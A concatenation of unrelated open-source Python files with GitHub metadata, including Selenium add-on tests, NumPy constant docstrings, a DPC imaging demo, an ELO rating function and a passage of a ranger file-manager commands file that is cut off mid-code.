zip = os.path.join(extensions, "webextensions-selenium-example.zip")
target = os.path.join(extensions, "webextensions-selenium-example")
with zipfile.ZipFile(zip, "r") as zip_ref:
zip_ref.extractall(target)
id = driver.install_addon(target)
assert id == "webextensions-selenium-example@example.com"
pages.load("blank.html")
injected = driver.find_element(By.ID, "webextensions-selenium-example")
assert injected.text == "Content injected by webextensions-selenium-example"
driver.uninstall_addon(id)
driver.refresh()
assert len(driver.find_elements(By.ID, "webextensions-selenium-example")) == 0
def test_install_uninstall_unsigned_addon_dir(driver, pages):
zip = os.path.join(extensions, "webextensions-selenium-example-unsigned.zip")
target = os.path.join(extensions, "webextensions-selenium-example-unsigned")
with zipfile.ZipFile(zip, "r") as zip_ref:
zip_ref.extractall(target)
id = driver.install_addon(target, temporary=True)
assert id == "webextensions-selenium-example@example.com"
pages.load("blank.html")
injected = driver.find_element(By.ID, "webextensions-selenium-example")
assert injected.text == "Content injected by webextensions-selenium-example"
driver.uninstall_addon(id)
driver.refresh()
assert len(driver.find_elements(By.ID, "webextensions-selenium-example")) == 0
|
{
"content_hash": "88bbd233067ecf57f4522f150cf80c53",
"timestamp": "",
"source": "github",
"line_count": 88,
"max_line_length": 87,
"avg_line_length": 37.86363636363637,
"alnum_prop": 0.7271908763505402,
"repo_name": "titusfortner/selenium",
"id": "0fdd9f8c688b8902bbe18ef5628b8d45d93bf0b1",
"size": "4120",
"binary": false,
"copies": "6",
"ref": "refs/heads/trunk",
"path": "py/test/selenium/webdriver/firefox/ff_installs_addons_tests.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ASP.NET",
"bytes": "825"
},
{
"name": "Batchfile",
"bytes": "4443"
},
{
"name": "C",
"bytes": "82917"
},
{
"name": "C#",
"bytes": "2989900"
},
{
"name": "C++",
"bytes": "2285448"
},
{
"name": "CSS",
"bytes": "1049"
},
{
"name": "Dockerfile",
"bytes": "1737"
},
{
"name": "HTML",
"bytes": "1379853"
},
{
"name": "Java",
"bytes": "6305900"
},
{
"name": "JavaScript",
"bytes": "2535570"
},
{
"name": "Makefile",
"bytes": "4655"
},
{
"name": "PowerShell",
"bytes": "213"
},
{
"name": "Python",
"bytes": "987676"
},
{
"name": "Ragel",
"bytes": "3086"
},
{
"name": "Ruby",
"bytes": "1038887"
},
{
"name": "Rust",
"bytes": "47487"
},
{
"name": "Shell",
"bytes": "29996"
},
{
"name": "Starlark",
"bytes": "399974"
},
{
"name": "TypeScript",
"bytes": "126843"
},
{
"name": "XSLT",
"bytes": "1047"
}
],
"symlink_target": ""
}
|
__all__ = ["Config"]
import __builtin__
from pandac.PandaModules import Filename
from ConfigParser import SafeConfigParser
APP_PATH = __builtin__.APP_PATH
class Config(SafeConfigParser):
def parse_into_object(self, object):
"""Parses the configuration file and sets the properties of the specified
object. Most likely this will be __builtin__."""
object.FULLSCREEN = self.getboolean("display", "fullscreen")
object.LOAD_DISPLAY = self.get("display", "framework").replace(" ", "").lower().replace("directx", "dx").replace("opengl", "gl")
res = self.get("display", "resolution")
if(object.RESOLUTION is None or object.RESOLUTION.strip().lower() in ["", "auto", "none", "keep", "current", "detect", "autodetect", "auto-detect"]):
object.RESOLUTION = None
else:
object.RESOLUTION = (int(self.get("display", "resolution").strip().lower().split("x")[0]),int(self.get("display", "resolution").strip().lower().split("x")[1]))
object.WIN_SIZE = (int(self.get("display", "windowSize").strip().lower().split("x")[0]),int(self.get("display", "windowSize").strip().lower().split("x")[1]))
object.SHOW_FPS = self.getboolean("performance", "showFpsMeter")
object.USE_CACHE = self.getboolean("performance", "useTextureCache")
object.INTERPOLATE_FRAMES = self.getboolean("performance", "interpolateFrames")
def load(self, file_name = None):
if(file_name == None):
self.readfp(open(self.make_filename().toOsSpecific()))
elif(isinstance(file_name, Filename)):
self.readfp(open(file_name.toOsSpecific()))
else:
raise TypeError, "Invalid type for Config.load()!"
@classmethod
def make_filename(self):
"""Returns the filename that config files have on this platform."""
return Filename(APP_PATH + "config.conf")
|
{
"content_hash": "8e77177b0c2231960db19c2a8a01a918",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 165,
"avg_line_length": 46.30769230769231,
"alnum_prop": 0.6733111849390919,
"repo_name": "asceth/devsyn",
"id": "800dcc2179a703a22e3b78ca1c341b2a7a5704d5",
"size": "1806",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "devsyn/core/config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "73726"
}
],
"symlink_target": ""
}
|
"""
test_pypostman
----------------------------------
Tests for `pypostman` module.
"""
import unittest
from pypostman import pypostman
class TestPypostman(unittest.TestCase):
def setUp(self):
pass
def test_something(self):
pass
def tearDown(self):
pass
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "299c06577ad6b15dac0542d950e45673",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 39,
"avg_line_length": 13.8,
"alnum_prop": 0.5594202898550724,
"repo_name": "skalanux/pypostman",
"id": "fdd9675e4490d710557235207e1a8f16692e5b5e",
"size": "392",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_pypostman.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "13372"
},
{
"name": "Shell",
"bytes": "6466"
}
],
"symlink_target": ""
}
|
"""
=========
Constants
=========
.. currentmodule:: numpy
NumPy includes several constants:
%(constant_list)s
"""
#
# Note: the docstring is autogenerated.
#
import re
import textwrap
# Maintain same format as in numpy.add_newdocs
constants = []
def add_newdoc(module, name, doc):
constants.append((name, doc))
add_newdoc('numpy', 'pi',
"""
``pi = 3.1415926535897932384626433...``
References
----------
https://en.wikipedia.org/wiki/Pi
""")
add_newdoc('numpy', 'e',
"""
Euler's constant, base of natural logarithms, Napier's constant.
``e = 2.71828182845904523536028747135266249775724709369995...``
See Also
--------
exp : Exponential function
log : Natural logarithm
References
----------
https://en.wikipedia.org/wiki/E_%28mathematical_constant%29
""")
add_newdoc('numpy', 'euler_gamma',
"""
``γ = 0.5772156649015328606065120900824024310421...``
References
----------
https://en.wikipedia.org/wiki/Euler-Mascheroni_constant
""")
add_newdoc('numpy', 'inf',
"""
IEEE 754 floating point representation of (positive) infinity.
Returns
-------
y : float
A floating point representation of positive infinity.
See Also
--------
isinf : Shows which elements are positive or negative infinity
isposinf : Shows which elements are positive infinity
isneginf : Shows which elements are negative infinity
isnan : Shows which elements are Not a Number
isfinite : Shows which elements are finite (not one of Not a Number,
positive infinity and negative infinity)
Notes
-----
NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). This means that Not a Number is not equivalent to infinity.
Also that positive infinity is not equivalent to negative infinity. But
infinity is equivalent to positive infinity.
`Inf`, `Infinity`, `PINF` and `infty` are aliases for `inf`.
Examples
--------
>>> np.inf
inf
>>> np.array([1]) / 0.
array([ Inf])
""")
add_newdoc('numpy', 'nan',
"""
IEEE 754 floating point representation of Not a Number (NaN).
Returns
-------
y : A floating point representation of Not a Number.
See Also
--------
isnan : Shows which elements are Not a Number.
isfinite : Shows which elements are finite (not one of
Not a Number, positive infinity and negative infinity)
Notes
-----
NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). This means that Not a Number is not equivalent to infinity.
`NaN` and `NAN` are aliases of `nan`.
Examples
--------
>>> np.nan
nan
>>> np.log(-1)
nan
>>> np.log([-1, 1, 2])
array([ NaN, 0. , 0.69314718])
""")
add_newdoc('numpy', 'newaxis',
"""
A convenient alias for None, useful for indexing arrays.
See Also
--------
`numpy.doc.indexing`
Examples
--------
>>> newaxis is None
True
>>> x = np.arange(3)
>>> x
array([0, 1, 2])
>>> x[:, newaxis]
array([[0],
[1],
[2]])
>>> x[:, newaxis, newaxis]
array([[[0]],
[[1]],
[[2]]])
>>> x[:, newaxis] * x
array([[0, 0, 0],
[0, 1, 2],
[0, 2, 4]])
Outer product, same as ``outer(x, y)``:
>>> y = np.arange(3, 6)
>>> x[:, newaxis] * y
array([[ 0, 0, 0],
[ 3, 4, 5],
[ 6, 8, 10]])
``x[newaxis, :]`` is equivalent to ``x[newaxis]`` and ``x[None]``:
>>> x[newaxis, :].shape
(1, 3)
>>> x[newaxis].shape
(1, 3)
>>> x[None].shape
(1, 3)
>>> x[:, newaxis].shape
(3, 1)
""")
add_newdoc('numpy', 'NZERO',
"""
IEEE 754 floating point representation of negative zero.
Returns
-------
y : float
A floating point representation of negative zero.
See Also
--------
PZERO : Defines positive zero.
isinf : Shows which elements are positive or negative infinity.
isposinf : Shows which elements are positive infinity.
isneginf : Shows which elements are negative infinity.
isnan : Shows which elements are Not a Number.
isfinite : Shows which elements are finite - not one of
Not a Number, positive infinity and negative infinity.
Notes
-----
NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). Negative zero is considered to be a finite number.
Examples
--------
>>> np.NZERO
-0.0
>>> np.PZERO
0.0
>>> np.isfinite([np.NZERO])
array([ True])
>>> np.isnan([np.NZERO])
array([False])
>>> np.isinf([np.NZERO])
array([False])
""")
add_newdoc('numpy', 'PZERO',
"""
IEEE 754 floating point representation of positive zero.
Returns
-------
y : float
A floating point representation of positive zero.
See Also
--------
NZERO : Defines negative zero.
isinf : Shows which elements are positive or negative infinity.
isposinf : Shows which elements are positive infinity.
isneginf : Shows which elements are negative infinity.
isnan : Shows which elements are Not a Number.
isfinite : Shows which elements are finite - not one of
Not a Number, positive infinity and negative infinity.
Notes
-----
NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). Positive zero is considered to be a finite number.
Examples
--------
>>> np.PZERO
0.0
>>> np.NZERO
-0.0
>>> np.isfinite([np.PZERO])
array([ True])
>>> np.isnan([np.PZERO])
array([False])
>>> np.isinf([np.PZERO])
array([False])
""")
add_newdoc('numpy', 'NAN',
"""
IEEE 754 floating point representation of Not a Number (NaN).
`NaN` and `NAN` are equivalent definitions of `nan`. Please use
`nan` instead of `NAN`.
See Also
--------
nan
""")
add_newdoc('numpy', 'NaN',
"""
IEEE 754 floating point representation of Not a Number (NaN).
`NaN` and `NAN` are equivalent definitions of `nan`. Please use
`nan` instead of `NaN`.
See Also
--------
nan
""")
add_newdoc('numpy', 'NINF',
"""
IEEE 754 floating point representation of negative infinity.
Returns
-------
y : float
A floating point representation of negative infinity.
See Also
--------
isinf : Shows which elements are positive or negative infinity
isposinf : Shows which elements are positive infinity
isneginf : Shows which elements are negative infinity
isnan : Shows which elements are Not a Number
isfinite : Shows which elements are finite (not one of Not a Number,
positive infinity and negative infinity)
Notes
-----
NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). This means that Not a Number is not equivalent to infinity.
Also that positive infinity is not equivalent to negative infinity. But
infinity is equivalent to positive infinity.
Examples
--------
>>> np.NINF
-inf
>>> np.log(0)
-inf
""")
add_newdoc('numpy', 'PINF',
"""
IEEE 754 floating point representation of (positive) infinity.
Use `inf` because `Inf`, `Infinity`, `PINF` and `infty` are aliases for
`inf`. For more details, see `inf`.
See Also
--------
inf
""")
add_newdoc('numpy', 'infty',
"""
IEEE 754 floating point representation of (positive) infinity.
Use `inf` because `Inf`, `Infinity`, `PINF` and `infty` are aliases for
`inf`. For more details, see `inf`.
See Also
--------
inf
""")
add_newdoc('numpy', 'Inf',
"""
IEEE 754 floating point representation of (positive) infinity.
Use `inf` because `Inf`, `Infinity`, `PINF` and `infty` are aliases for
`inf`. For more details, see `inf`.
See Also
--------
inf
""")
add_newdoc('numpy', 'Infinity',
"""
IEEE 754 floating point representation of (positive) infinity.
Use `inf` because `Inf`, `Infinity`, `PINF` and `infty` are aliases for
`inf`. For more details, see `inf`.
See Also
--------
inf
""")
if __doc__:
constants_str = []
constants.sort()
for name, doc in constants:
s = textwrap.dedent(doc).replace("\n", "\n ")
# Replace sections by rubrics
lines = s.split("\n")
new_lines = []
for line in lines:
m = re.match(r'^(\s+)[-=]+\s*$', line)
if m and new_lines:
prev = textwrap.dedent(new_lines.pop())
new_lines.append('%s.. rubric:: %s' % (m.group(1), prev))
new_lines.append('')
else:
new_lines.append(line)
s = "\n".join(new_lines)
# Done.
constants_str.append(""".. data:: %s\n %s""" % (name, s))
constants_str = "\n".join(constants_str)
__doc__ = __doc__ % dict(constant_list=constants_str)
del constants_str, name, doc
del line, lines, new_lines, m, s, prev
del constants, add_newdoc
|
{
"content_hash": "188a8502af1a64d29a970b453bebd42b",
"timestamp": "",
"source": "github",
"line_count": 416,
"max_line_length": 75,
"avg_line_length": 22.129807692307693,
"alnum_prop": 0.5821203562893765,
"repo_name": "WarrenWeckesser/numpy",
"id": "2c629ad33da8d62a66f647d829021e42bcd45b80",
"size": "9231",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "numpy/doc/constants.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "9059444"
},
{
"name": "C++",
"bytes": "174989"
},
{
"name": "Fortran",
"bytes": "10884"
},
{
"name": "JavaScript",
"bytes": "16928"
},
{
"name": "Makefile",
"bytes": "4290"
},
{
"name": "Python",
"bytes": "8313055"
},
{
"name": "Shell",
"bytes": "9612"
},
{
"name": "sed",
"bytes": "5741"
}
],
"symlink_target": ""
}
|
from __future__ import with_statement
import sys
import os
from setuptools import setup
with open('README.rst') as file:
long_description = file.read()
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
setup(
name='ExEmGel',
version='0.5',
author = "Dave Collins",
author_email = "dave@hopest.net",
packages=['exemgel',],
license='MIT',
description = "Simple xml reader",
url = "https://github.com/thedavecollins/ExEmGel",
long_description=long_description,
classifiers=[
'Intended Audience :: Developers',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
"License :: OSI Approved",
"License :: OSI Approved :: MIT License",
"Topic :: Text Processing",
"Topic :: Text Processing :: Markup",
"Topic :: Text Processing :: Markup :: XML",
],
)
|
{
"content_hash": "1557bcd4b19a0a65e3759c9b8da35548",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 113,
"avg_line_length": 30.428571428571427,
"alnum_prop": 0.532394366197183,
"repo_name": "thedavecollins/ExEmGel",
"id": "d97532bbef8194cb7527c072dbd0808c197604f1",
"size": "1088",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8789"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
# Grammar
from arpeggio import ParserPython, Optional, EOF
def g(): return [Optional('first'), Optional('second'), Optional('third')], EOF
def test_optional_in_choice():
parser = ParserPython(g)
input_str = "second"
parse_tree = parser.parse(input_str)
assert parse_tree is not None
|
{
"content_hash": "e2d0c5a7d53830ad0fcac046694e7b96",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 82,
"avg_line_length": 26.615384615384617,
"alnum_prop": 0.6936416184971098,
"repo_name": "leiyangyou/Arpeggio",
"id": "de6484b65745a348e43548f53bbed98f0067b2cc",
"size": "827",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/unit/regressions/issue_20/test_issue_20.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "127973"
},
{
"name": "Ren'Py",
"bytes": "2016321"
},
{
"name": "Shell",
"bytes": "575"
}
],
"symlink_target": ""
}
|
"""
This is an example script utilizing dpc.py for Differential Phase Contrast
(DPC) imaging based on Fourier shift fitting.
This script requires a SOFC folder containing the test data in your home
directory. The default path for the results (texts and JPEGs) is also your home
directory. It will automatically download the data to your home directory if
you installed wget and unzip utilities. You can also manually download and
decompress the data at https://www.dropbox.com/s/963c4ymfmbjg5dm/SOFC.zip
Steps
-----
In this file:
1. Set parameters
2. Load the reference image
3. Save intermediate and final results
in skxray.dpc.dpc_runner:
1. Dimension reduction along x and y direction
2. 1-D IFFT
3. Same calculation on each diffraction pattern
3.1. Read a diffraction pattern
3.2. Dimension reduction along x and y direction
3.3. 1-D IFFT
3.4. Nonlinear fitting
4. Reconstruct the final phase image
"""
import os
from subprocess import call
import scipy
import numpy as np
import matplotlib.pyplot as plt
from pims import ImageSequence
import zipfile
from skxray.core import dpc
dpc.logger.setLevel(dpc.logging.DEBUG)
handler = dpc.logging.StreamHandler()
handler.setLevel(dpc.logging.DEBUG)
dpc.logger.addHandler(handler)
def load_image(filename):
"""
Load an image
Parameters
----------
filename : string
the location and name of an image
Return
----------
t : 2-D numpy array
store the image data
"""
if os.path.exists(filename):
t = plt.imread(filename)
else:
print('Please download and decompress the test data to your home directory\n\
Google drive link, https://drive.google.com/file/d/0B3v6W1bQwN_AVjdYdERHUDBsMmM/edit?usp=sharing\n\
Dropbox link, https://www.dropbox.com/s/963c4ymfmbjg5dm/SOFC.zip')
raise Exception('File not found: %s' % filename)
return t
def unzip(source_filename, verbose=True):
with zipfile.ZipFile(source_filename) as zf:
num = len(zf.infolist())
for idx, member in enumerate(zf.infolist()):
if verbose and idx % (num//100) == 0:
print("{:3d}% Extracting {}/{}".format(
int(idx/num*100), idx+1, len(zf.infolist())))
zf.extract(member)
def run():
# download to this folder
current_folder = os.sep.join(__file__.split(os.sep)[:-1])
dpc_demo_data_path = os.path.join(current_folder, 'SOFC')
if not os.path.exists(dpc_demo_data_path):
sofc_file = os.path.join(current_folder, 'SOFC.zip')
print('The required test data directory was not found.'
'\nDownloading the test data to %s' % dpc_demo_data_path)
# todo make this not print every fraction of a second
call(('wget https://www.dropbox.com/s/963c4ymfmbjg5dm/SOFC.zip -P %s' %
current_folder),
shell=True)
# unzip it into this directory
unzip(sofc_file)
# 1. Set parameters
start_point = [1, 0]
first_image = 1
pixel_size = (55, 55)
focus_to_det = 1.46e6
scan_xstep = 0.1
scan_ystep = 0.1
scan_rows = 121
scan_cols = 121
energy = 19.5
roi = None
padding = 0
weighting = 1.
bad_pixels = None
solver = 'Nelder-Mead'
images = ImageSequence(dpc_demo_data_path + "/*.tif")
img_size = images[0].shape
ref_image = np.ones(img_size)
scale = True
negate = True
print('running dpc')
# 2. Use dpc.dpc_runner
phase, amplitude = dpc.dpc_runner(
ref_image, images, start_point, pixel_size, focus_to_det, scan_rows,
scan_cols, scan_xstep, scan_ystep, energy, padding, weighting, solver,
roi, bad_pixels, negate, scale)
# 3. Save intermediate and final results
scipy.misc.imsave(os.path.join(current_folder, 'phase.jpg'), phase)
np.savetxt(os.path.join(current_folder, 'phase.txt'), phase)
scipy.misc.imsave(os.path.join(current_folder, 'amplitude.jpg'), amplitude)
np.savetxt(os.path.join(current_folder, 'amplitude.txt'), amplitude)
if __name__ == '__main__':
run()
|
{
"content_hash": "d7db6f3303a786f51c27d2a445e76d4d",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 114,
"avg_line_length": 31.293233082706767,
"alnum_prop": 0.6504084574723691,
"repo_name": "ericdill/scikit-beam-examples",
"id": "92e1b5388aca7725002980cce8393f5e32cf4160",
"size": "6597",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "demos/dpc/dpc_demo.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "24813"
}
],
"symlink_target": ""
}
|
"""
Resource link.
This file is part of the everest project.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Created on Jun 29, 2011.
"""
from everest.resources.interfaces import IResourceLink
from everest.resources.utils import resource_to_url
from zope.interface import implementer # pylint: disable=E0611,F0401
__docformat__ = 'reStructuredText en'
__all__ = ['Link',
]
@implementer(IResourceLink)
class Link(object):
"""
A resource link.
:note: The URL for the linked resource is created lazily; at
instantiation time, we may not have a request to generate the URL.
"""
def __init__(self, linked_resource, rel,
type=None, title=None, length=None): # pylint: disable=W0622
self.__linked_resource = linked_resource
self.rel = rel
self.type = type
self.title = title
self.length = length
@property
def href(self):
return resource_to_url(self.__linked_resource)
|
{
"content_hash": "7930fc971f1fc35d7b2c436a9dc2968b",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 77,
"avg_line_length": 28,
"alnum_prop": 0.6716269841269841,
"repo_name": "helixyte/everest",
"id": "a6e4457dd86d7d3d2b330576d0fb1a3e647a5a3a",
"size": "1008",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "everest/resources/link.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "255"
},
{
"name": "Makefile",
"bytes": "4594"
},
{
"name": "Python",
"bytes": "1167712"
},
{
"name": "Shell",
"bytes": "4513"
}
],
"symlink_target": ""
}
|
def elo(winner_rank, loser_rank, weighting):
"""
:param winner: The Player that won the match.
:param loser: The Player that lost the match.
:param weighting: The weighting factor to suit your comp.
:return: (winner_new_rank, loser_new_rank) Tuple.
This follows the ELO ranking method.
"""
winner_rank_transformed = 10 ** (winner_rank / 400)
opponent_rank_transformed = 10 ** (loser_rank / 400)
transformed_sum = winner_rank_transformed + opponent_rank_transformed
winner_score = winner_rank_transformed / transformed_sum
loser_score = opponent_rank_transformed / transformed_sum
winner_rank = winner_rank + weighting * (
1 - winner_score)
loser_rank = loser_rank - weighting * loser_score
# Set a floor of 100 for the rankings.
winner_rank = 100 if winner_rank < 100 else winner_rank
loser_rank = 100 if loser_rank < 100 else loser_rank
winner_rank = float('{result:.2f}'.format(result=winner_rank))
loser_rank = float('{result:.2f}'.format(result=loser_rank))
return winner_rank, loser_rank
|
{
"content_hash": "aebcba5c4e5c90a3288cda39f43caea8",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 73,
"avg_line_length": 38.82142857142857,
"alnum_prop": 0.6807727690892365,
"repo_name": "ulternate/table_tennis_league",
"id": "be9bd5f7d840a39915f5c547fcf6ced95fe85e75",
"size": "1087",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rankings/elo.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "105"
},
{
"name": "HTML",
"bytes": "19930"
},
{
"name": "Python",
"bytes": "24809"
}
],
"symlink_target": ""
}
|
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_swarming_lesser_dewback.iff"
result.attribute_template_id = 9
result.stfName("monster_name","dewback")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
{
"content_hash": "a194ee2e0d5794cdddc67230f9ae02e9",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 69,
"avg_line_length": 23,
"alnum_prop": 0.6989966555183946,
"repo_name": "anhstudios/swganh",
"id": "6f82ddc433771fe82010c6b512180c2212e33093",
"size": "444",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "data/scripts/templates/object/mobile/shared_swarming_lesser_dewback.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11887"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2357839"
},
{
"name": "CMake",
"bytes": "41264"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7503510"
},
{
"name": "SQLPL",
"bytes": "42770"
}
],
"symlink_target": ""
}
|
"""
This file is part of ranger, the console file manager.
This configuration file is licensed under the same terms as ranger.
===================================================================
NOTE: If you copied this file to ~/.config/ranger/commands_full.py,
then it will NOT be loaded by ranger, and only serve as a reference.
===================================================================
This file contains ranger's commands.
It's all in python; lines beginning with # are comments.
Note that additional commands are automatically generated from the methods
of the class ranger.core.actions.Actions.
You can customize commands in the file ~/.config/ranger/commands.py.
It has the same syntax as this file. In fact, you can just copy this
file there with `ranger --copy-config=commands' and make your modifications.
But make sure you update your configs when you update ranger.
===================================================================
Every class defined here which is a subclass of `Command' will be used as a
command in ranger. Several methods are defined to interface with ranger:
execute(): called when the command is executed.
cancel(): called when closing the console.
tab(tabnum): called when <TAB> is pressed.
quick(): called after each keypress.
tab() argument tabnum is 1 for <TAB> and -1 for <S-TAB> by default
The return values for tab() can be either:
None: There is no tab completion
A string: Change the console to this string
A list/tuple/generator: cycle through every item in it
The return value for quick() can be:
False: Nothing happens
True: Execute the command afterwards
The return value for execute() and cancel() doesn't matter.
===================================================================
Commands have certain attributes and methods that facilitate parsing of
the arguments:
self.line: The whole line that was written in the console.
self.args: A list of all (space-separated) arguments to the command.
self.quantifier: If this command was mapped to the key "X" and
the user pressed 6X, self.quantifier will be 6.
self.arg(n): The n-th argument, or an empty string if it doesn't exist.
self.rest(n): The n-th argument plus everything that followed. For example,
if the command was "search foo bar a b c", rest(2) will be "bar a b c"
self.start(n): Anything before the n-th argument. For example, if the
command was "search foo bar a b c", start(2) will be "search foo"
===================================================================
And this is a little reference for common ranger functions and objects:
self.fm: A reference to the "fm" object which contains most information
about ranger.
self.fm.notify(string): Print the given string on the screen.
self.fm.notify(string, bad=True): Print the given string in RED.
self.fm.reload_cwd(): Reload the current working directory.
self.fm.thisdir: The current working directory. (A File object.)
self.fm.thisfile: The current file. (A File object too.)
self.fm.thistab.get_selection(): A list of all selected files.
self.fm.execute_console(string): Execute the string as a ranger command.
self.fm.open_console(string): Open the console with the given string
already typed in for you.
self.fm.move(direction): Moves the cursor in the given direction, which
can be something like down=3, up=5, right=1, left=1, to=6, ...
File objects (for example self.fm.thisfile) have these useful attributes and
methods:
tfile.path: The path to the file.
tfile.basename: The base name only.
tfile.load_content(): Force a loading of the directories content (which
obviously works with directories only)
tfile.is_directory: True/False depending on whether it's a directory.
For advanced commands it is unavoidable to dive a bit into the source code
of ranger.
===================================================================
"""
from __future__ import absolute_import, division, print_function
# Standard Library
import re
from glob import iglob
from os import environ, makedirs, mknod, getenv
from os.path import exists, expanduser, isfile, join, lexists
from pathlib import Path
from subprocess import DEVNULL, PIPE, Popen, run
from typing import Iterable, List, Optional, Pattern, Set
# 3rd Party
# You always need to import ranger.api.commands here to get the Command class:
from ranger.api.commands import Command
def get_flags(cmd: str) -> Set[str]:
help = run([cmd, '--help'], stderr=DEVNULL, stdout=PIPE).stdout
flags = run(['grep', '-E', '-o'], input=help, stdout=PIPE, stderr=DEVNULL).stdout.decode('utf-8').split('\n')
return set(flags)
class git(Command):
"""git <subcommand> [<option>, ...] [--] [<file>, ...]
Wrapper for git commands. Good completion.
"""
non_i_cmds: Set[str] = {
'add',
'archive',
'clean',
'clone',
'fetch',
'init',
'mv',
'pull',
'push',
'rm',
}
opts: Set[str] = {
'--bare',
'--exec-path',
'--git-dir',
'--help',
'--html-path',
'--info-path',
'--man-path',
'--namespace',
'--no-pager',
'--no-replace-objects',
'--paginate',
'--version',
'--work-tree',
'-C',
'-c',
'-p',
}
refs: Set[str] = {
'HEAD',
'HEAD^1',
'HEAD^2',
'HEAD^3',
'HEAD~1',
'HEAD~2',
'HEAD~3',
'FETCH_HEAD',
'ORIG_HEAD',
'master',
}
cmds: Set[str] = {
'am',
'apply',
'bisect',
'blame',
'branch',
'cat-file',
'checkout',
'checkout-index',
'cherry',
'commit',
'commit-tree',
'count-objects',
'diff',
'diff-files',
'diff-index',
'diff-tree',
'fast-export',
'filter-branch',
'for-each-ref',
'for-ls-tree',
'grep',
'hash-object',
'help',
'index-pack',
'log',
'ls-files',
'merge',
'merge-file',
'merge-index',
'mktag',
'mktree',
'name-rev',
'pack-redundant',
'prune-packed',
'read-tree',
'rebase',
'reflog',
'remote',
'repack',
'reset',
'rev-list',
'show',
'show-branches',
'status',
'symbolic-ref',
'tag',
'unpack-file',
'update-ref',
'var',
'verify-pack',
'worktree',
'write-tree',
}
def _get_subcmd(self) -> Optional[str]:
if not self.args or len(self.args) == 1:
return None
for word in self.args[1:]:
if not word.startswith('-') and (word in git.cmds or word in git.non_i_cmds):
return word
return None
def execute(self):
if len(self.args) < 2:
return
sub_cmd: Optional[str] = self._get_subcmd()
if sub_cmd is None:
return
elif (sub_cmd not in git.cmds) and (sub_cmd not in git.non_i_cmds):
return
is_i: bool = sub_cmd in git.cmds
cmd: List[str] = ['git'] + \
(['--paginate'] if is_i else []) + self.args[1:]
# if any files marked add them to args
if len(self.fm.thistab.get_selection()) > 1:
cmd.append('--')
cmd.extend((i.path for i in self.fm.thistab.get_selection()))
try:
# synchronized
if is_i:
run(cmd)
# async
else:
from threading import Thread
thread: Thread = Thread(target=Popen, name=f"git-{sub_cmd}", kwargs={
'args': cmd, 'stdout': DEVNULL, 'stderr': DEVNULL})
thread.start()
self.fm.notify(f'{" ".join(cmd)} spawned')
self.fm.ui.redraw_main_column()
self.fm.ui.need_redraw = True
except Exception as e:
self.fm.notify(f'An error has occurred {e}', bad=True)
def tab(self, tabnum):
if len(self.args) == 1:
return (f"git {cmd}" for cmd in
(git.cmds | git.non_i_cmds | git.opts))
elif len(self.args) > 1:
# complete flags
if self.args[-1].startswith('-'):
subcmd: Optional[str] = self._get_subcmd()
flags: Iterable[str] = None
if subcmd:
pat: Pattern[str] = re.compile(
r'--[a-z][-a-z_]+|-[a-zA-Z]')
s: str = run(['git', '--no-pager', subcmd, '-h'],
stdout=PIPE,
stderr=DEVNULL).stdout.decode('utf-8')
flags = (
(" ".join(self.args[:-1]) +
' ' + match.group(0)).strip()
for match in pat.finditer(s))
else:
flags = (
(" ".join(self.args[:-1]) + " " + opt).strip()
for opt in git.opts)
if self.args[-1] == '-' or self.args[-1] == '--':
return flags
else:
return (flag for flag in flags
if (flag in self.args[-1]) or
(self.args[-1] in flag))
# relative paths
elif self.args[-1].startswith('./'):
return ((" ".join(self.args[:-1]) + " " + node).strip()
for node in iglob(join(self.args[-1], '*'))
if self.args[-1] in node or node in self.args[-1])
else:
pat: Pattern[str] = re.compile(r'\w+')
stdout: str = run(
['git', '--no-pager', 'branch'], stdout=PIPE, stderr=DEVNULL).stdout.decode('utf-8')
